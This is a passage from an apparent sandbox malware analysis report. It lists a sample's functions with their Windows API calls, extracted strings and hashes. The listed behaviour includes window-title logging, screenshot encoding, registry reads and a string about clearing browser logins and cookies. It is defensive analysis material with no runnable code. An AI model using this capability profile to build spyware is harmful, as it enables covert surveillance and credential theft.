                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 687cc25b70590890ee4835b3ee453ca5d573141b8347a1c076274b7774bdc746
                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                  • Opcode Fuzzy Hash: 687cc25b70590890ee4835b3ee453ca5d573141b8347a1c076274b7774bdc746
                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                  APIs
                                                  Strings
                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                  • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                  • API String ID: 3472027048-1236744412
                                                  • Opcode ID: 4a619795ed26f07729558821670becd2cfa677d22f1631e7b4f52437a2d7f7fe
                                                  • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                  • Opcode Fuzzy Hash: 4a619795ed26f07729558821670becd2cfa677d22f1631e7b4f52437a2d7f7fe
                                                  • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                  APIs
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.KERNELBASE(00000000), ref: 0041269D
                                                  • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: @CG$exepath$BG
                                                  • API String ID: 4119054056-3221201242
                                                  • Opcode ID: efcd0af1208699037f09edad500f6ec840cfbf7b9737e1f52f1688804d5b7727
                                                  • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                  • Opcode Fuzzy Hash: efcd0af1208699037f09edad500f6ec840cfbf7b9737e1f52f1688804d5b7727
                                                  • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                  • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                  • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                  APIs
                                                    • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                    • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                    • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                  • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                  • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$ForegroundLength
                                                  • String ID: [ $ ]
                                                  • API String ID: 3309952895-93608704
                                                  • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                  • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                  • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                  • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                  • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                  • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                  • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                  • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                  • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                  • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                    • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                    • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                  • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                  • String ID:
                                                  • API String ID: 737400349-0
                                                  • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                  • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                  • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                  • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                  • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                  • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                  • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                  • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                  • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                  • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                  • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                  • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                  • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                  • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: >G
                                                  • API String ID: 180926312-1296849874
                                                  • Opcode ID: 8d0b434eb08014b87a604917509e4c02cb712b8183ad08954feb5266861ff0be
                                                  • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                  • Opcode Fuzzy Hash: 8d0b434eb08014b87a604917509e4c02cb712b8183ad08954feb5266861ff0be
                                                  • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                  APIs
                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID: $fD
                                                  • API String ID: 1807457897-3092946448
                                                  • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                  • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                  • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                  • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                  • String ID: image/jpeg
                                                  • API String ID: 1291196975-3785015651
                                                  • Opcode ID: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                                                  • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                  • Opcode Fuzzy Hash: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                                                  • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                  • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                  • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                    • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                    • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                    • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                  • String ID: image/png
                                                  • API String ID: 1291196975-2966254431
                                                  • Opcode ID: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                                                  • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                  • Opcode Fuzzy Hash: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                                                  • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                  Strings
